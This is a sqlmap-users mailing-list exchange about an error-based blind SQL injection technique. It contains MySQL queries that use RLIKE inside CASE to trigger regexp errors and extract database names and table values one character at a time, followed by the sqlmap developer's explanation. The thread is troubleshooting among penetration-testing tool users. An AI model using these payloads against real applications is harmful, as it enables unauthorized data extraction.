Hi.
Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
here (in your case) is to PROVOKE errors on False, and that's exactly
what's going on here.
In case of True, RLIKE is called with perfectly valid 0x7474747474, while
in case of False its called with errorneous regexp 0x28 ('parentheses not
balanced').
Bye
On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com>
wrote:
> Have an injection that I can use RLIKE to induce a 500 error, but it only
> works in some circumstances. Enumerating the DATABASE() value works, as
> well as the current user, but enumerating values from the database tables
> fails. Even as root on the box, the RLIKE query fails to throw an exception
> when attempting to use RLIKE in some instances.
>
> As you can see in the output below, the user can select the first name
> value from the users table (which is ‘admin’). When using RLIKE to test the
> first character returned with DATABASE() (a ‘p’), you get the parentheses
> not balanced exception as expected. You also get this exception when simply
> selecting ‘a’.
>
> But when you select the first row from the users table and grab the first
> character (an ‘a’), no exception is thrown and an empty result set is
> returned.
>
> Any thoughts?
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
> 0x7474747474 ELSE 0x28 END));
> Empty set (0.01 sec)
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
